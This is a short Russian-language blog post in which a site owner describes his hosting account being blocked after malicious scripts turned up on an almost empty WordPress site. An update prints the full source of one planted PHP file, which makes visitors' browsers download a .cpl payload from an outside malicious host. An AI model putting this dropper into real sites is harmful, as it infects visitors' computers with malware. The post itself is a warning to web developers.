Вновь приветствую вас, дорогие читатели. Сегодня я бы хотел написать небольшую заметку о том, как один из моих сайтов, ни с того ни с чего, стал фишинговым.

Началось всё с того, что 21 июля, приблизительно в обед, мне пришло очень неожиданное письмо на почтовый ящик:

После этого я, естественно, сразу полез проверять все свои домены, которые хостятся на данном аккаунте, и действительно, сайты были заблокированы, а вместо них страничка с обобщенной информацией о блокировке:

После того, как пятиминутный шок прошел, я полез в панель управления моим аккаунтом и написал в тех. поддержку просьбу о том, чтобы меня разблокировали и дали возможность хотя бы удалить зловредные скрипты. Ответили, к счастью, довольно быстро (хотя наверное это из-за того, что приоритет моего «тикета» я поставил самый высокий), а также разрешили удалить тот некий Comprovante.php и посоветовали в следующий раз следить за файлами, которые я заливаю на сайт. Так что можно считать, что вопрос был решен в течении 15 минут.

Вроде бы ничего страшного, но осадок остался. Сейчас вы скажете, что «сам виноват, нехер было всякие скрипты левые заливать на сайт». В целом, вы правы, но суть в том, что сайт был абсолютно пустой. На нём, считайте, был только свежеустановленный WordPress, пару картинок, да и всё. В общем, откуда взялся этот вредоносный скрипт остается загадкой.

К сожалению, удалял скрипт в спешке, так как срочно надо было восстанавливать все сайты, и не сохранил его на компьютере для дальнейшего изучения. Но поискав информацию о нём на зарубежных сайтах обнаружил, что данный скрипт, при обращении к нему, пытается установить на компьютер пользователя некий Comprovante.exe, а тот, в свою очередь, является трояном Trojan.Win32.Generic.

Что хотелось бы добавить в заключение к всему этому: Веб-разработчики, да и все остальные люди связанные с сайтами, будьте осторожны. Я понимаю, что с данной проблемой, наверное, могут столкнуться только начинающие «создатели сайтофф», но бдительность не помешает.

P.S.: Да и к тому же, теперь мой домен во многих malware-списках помечен как опасный. В следствии с этим, на популярном Web of Trust ему уже выставлен наихудший рейтинг. Так что, похоже, придется забрасывать домен. Всё-равно я его толком и не использовал...

 

Добавлено 29.08.12:

Вот это и случилось вновь, снова тот же сайт был заблокирован, и снова за вредоносные скрипты. На этот раз скрипт был другой, под названием titulo.php и лежал он в папке со скачанной темой для WordPress. В отличие от прошлого раза, я успел слить этот скрипт на компьютер.

Вот что содержалось внутри файла:

<?php
header('Content-type: application/Log');
header('Content-Disposition: attachment; filename="titulo.cpl"');
readfile('http://тутбылвредоносныйсайт/titulo.cpl');
?>

Как можно заметить, когда пользователь попадает на этот PHP-файл, браузер, в большинстве случаев, автоматически начинает скачивать некий titulo.cpl. Что внутри этого файла — остается загадкой, так как он бинарный и, по сути, является неким Control Panel Item в Windows.

Отчет на VirusTotal